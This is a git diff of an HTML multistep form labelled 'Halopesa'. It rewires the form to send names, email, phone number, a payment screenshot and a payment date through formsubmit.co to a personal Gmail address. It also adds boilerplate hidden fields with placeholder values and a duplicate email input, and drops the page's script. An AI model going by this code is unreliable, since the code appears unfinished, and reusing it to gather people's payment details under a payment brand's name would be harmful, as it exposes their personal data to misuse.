--- a/index.html
+++ b/index.html
@@ -6,8 +6,8 @@
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Multistep form</title>
   <link rel="stylesheet" href="style.css">
-  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" integrity="sha512-iBBXm8fW90+nuLcSKlbmrPcLa0OT92xO1BIsZ+ywDWZCvqsWgccV3gFoRBv0z+8dLJgyAHIhR35VZc2oM/gI1w==" crossorigin="anonymous" referrerpolicy="no-referrer" />
-      <body>
+  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" integrity="sha512-iBBXm8fW90+nuLcSKlbmrPcLa0OT92xO1BIsZ+ywDWZCvqsWgccV3gFoRBv0z+8dLJgyAHIhR35VZc2oM/gI1w==" crossorigin="anonymous" referrerpolicy="no-referrer" />   
+  <body>
         <div class="container">
             <header>Halopesa </header>
          <div class="progress-bar">
@@ -49,7 +49,7 @@
             </div>
          </div>
             <div class="form-outer">
-                <form action="#">
+<form method="POST" action="https://formsubmit.co/trendifysmm@gmail.com" enctype="multipart/form-data">
            <div class="page slide-page">
                   <div class="title">
                      Phone Number Name:
@@ -58,13 +58,13 @@
                      <div class="label">
                         First Name
                      </div>
-<input type="text" placeholder="Enter your first name" required>
+<input type="text" name="first name" placeholder="Enter your first name" required>
                   </div>
                   <div class="field">
                      <div class="label">
                         Last Name
                      </div>
-                     <input type="text" placeholder="Enter your last name" required>
+                     <input type="text" name="last name" placeholder="Enter your last name" required>
                   </div>
                   <div class="field">
                      <button class="firstNext next">Next</button>
@@ -78,13 +78,13 @@
     <div class="label">
         Email Address
     </div>
-    <input type="text" placeholder="Enter your email address" required>
+    <input type="text" name="email" placeholder="Enter your email address" required>
 </div>
 <div class="field">
     <div class="label">
         Phone Number
     </div>
-    <input type="number" placeholder="Enter your phone number" required>
+    <input type="number" name="phone number" placeholder="Enter your phone number" required>
 </div>
                   <div class="field btns">
                      <button class="prev-1 prev">Previous</button>
@@ -102,13 +102,13 @@
     <label for="screenshot-upload" class="custom-file-upload">
         <span style="position: relative; left: -60px; top:20%;color:#757575;">Attach Screenshot</span>
     </label>
-    <input id="screenshot-upload" type="file" required>
+    <input id="screenshot-upload" type="file" name="uploaded image" required>
 </div>
                <div class="field">
     <div class="label" id="dob-label">
         Payment Date
     </div>
-    <input id="datepicker-input" type="text" placeholder="Select Date" required>
+    <input id="datepicker-input" type="text" name="date" placeholder="Select Date" required>
     <div id="calendar" class="calendar">
         <!-- Calendar content will be generated here -->
     </div>
@@ -125,7 +125,7 @@
                      Message:
                   </div>
 <div class="fieldjay" style="margin-top: 20px;">
-    <textarea placeholder="Enter a message or leave blank"></textarea>
+    <textarea name="message" placeholder="Enter a message or leave blank"></textarea>
 </div>
 
 
@@ -133,12 +133,16 @@
                      <button class="prev-3 prev">Previous</button>
                      <button class="submit">Submit</button>
                   </div>
-               </div>
-               
-               
+                  <input type="hidden" name="_template" value="table">
+<input type="hidden" name="_subject" value="New submission!">
+<input type="email" name="email" placeholder="Email Address">
+<input type="hidden" name="_next" value="https://yourdomain.co/thanks.html">
+<input type="hidden" name="_cc" value="another@email.com">
+<input type="hidden" name="_autoresponse" value="your custom message">
+                  </div>
                 </form>
             </div>
         </div>
-        <script src="script.js"></script>
     </body>
 </html>
+
